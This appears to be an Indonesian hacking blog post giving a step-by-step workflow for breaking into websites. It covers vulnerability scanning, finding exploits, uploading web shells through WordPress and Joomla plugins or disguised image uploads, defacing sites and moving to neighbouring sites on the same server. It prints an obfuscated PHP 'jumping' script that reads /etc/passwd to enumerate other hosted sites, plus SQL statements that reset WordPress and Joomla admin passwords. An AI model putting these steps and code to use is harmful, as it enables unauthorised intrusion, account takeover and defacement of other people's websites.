Alur Web Attack

Pada hari ini saya akan posting alur web attack buat yang mau blajar silahkan Belajar

1. Scan

Cari tau dimana letak kelemahaan web target. bisa di scan pakai beberapa tool scanner. diantaranya yang paling terkenal :
#Acunetix (Windows)
# Nikto (Linux)
Selain bisa mendapatkan bug kita juga bisa mengumpulkan informasi berguna dari web target

2. XPL / SQLi

Setelah menemukan data dari web target . kita coba cari cara untuk meng-exploitasi bug bug yang sudah kita temukan dengan tool scanner tadi . dibawah ini daftar situ yang menyediakan macam" exploit :
#Exploit Database
#Packet Strom
#Injector
#Hackown

apabila target menggunakan css joomla / wordpress, kita dapat mencari exploit untuk plugin-plugin yang digunakan web target . karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhaanya. jadi kita tau isi folder dari web target , termasuk plugin-plugin apa saja yang digunakan .

Kalau tekni SQL dapat dilihat dari sini

Ebook beserta source website untuk praktek tenik sql download disini

3. Upload Shell

website sudah bisa di exploitasi dan kita sudah bisa masuk ke halaman admin . sekarang kita tinggal upload sheel sekarang :

-Upload shell di wordpress bisa mengupload plugin or theme yang sudah di sisipi file shell
-Upload Shell di joomla juga sama, cuma bisa juga menggunakan plugin Ninja Exploit
-Upload shell di CMS biasa bisa melalui upload gambar , kalau tidak bisa coba shell"nya di rename menjadi shell.php.jpg lalu upload .

Setelah shell berhasil di upload tinggal di panggil letak URL shell"nya dimana.

4.Deface or Jumping

Kalau mau gaya" (Deface) ,cari file index.php atau semacamnya lalu rubah didalam dengan script deface yang kita punya . buat yang malas bikin script deface dapat menggunakan tool DefaceMaker. coba archive website yang sudah kita deface ke situs ini :

#Indonesia Defacer
#Magelang Cyber
#Zona-H

Tidak cukup hanya bisa men-deface satu web saja. coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface...
caranya....

Script jumping ;

Code:

$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('Error: Safe Mode is On');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die(' Error : Can Not Read Config Of Server '); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\​162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3​d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\​x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x​6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a​*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154​\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2​a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\​x2a\052";

?>

-Upload Script Jumping
-Rename jadi jumpingfinder.php
-Panggil Letak URL tersebut
-Masuk ke Public_html web target
-Masuk ke Mysql (Cari account Mysql di file config)
-Cari table User
-Update password Admin

#Wordpress

PHP Code:

UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1; 

#Joomla

PHP Code:

update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"; 

5.Rooting

Contributors

Pages

Developer's Note

Total Tayangan Halaman

KnowLedge More - Share Pengetahuan Dunia

Alur Web Attack

Alur Web Attack

About: jefri

Tidak ada komentar:

Posting Komentar

Recent Posts

Popular Posts

Recent Comments

Labels

Labels

Labels

Find us on Facebook

Labels

Contributors

Pages

Developer's Note

Total Tayangan Halaman

Alur Web Attack

Alur Web Attack

About: jefri

You may also like...

Tidak ada komentar:

Posting Komentar

Recent Posts

Popular Posts

Recent Comments

Labels

Labels

Labels

Find us on Facebook

Labels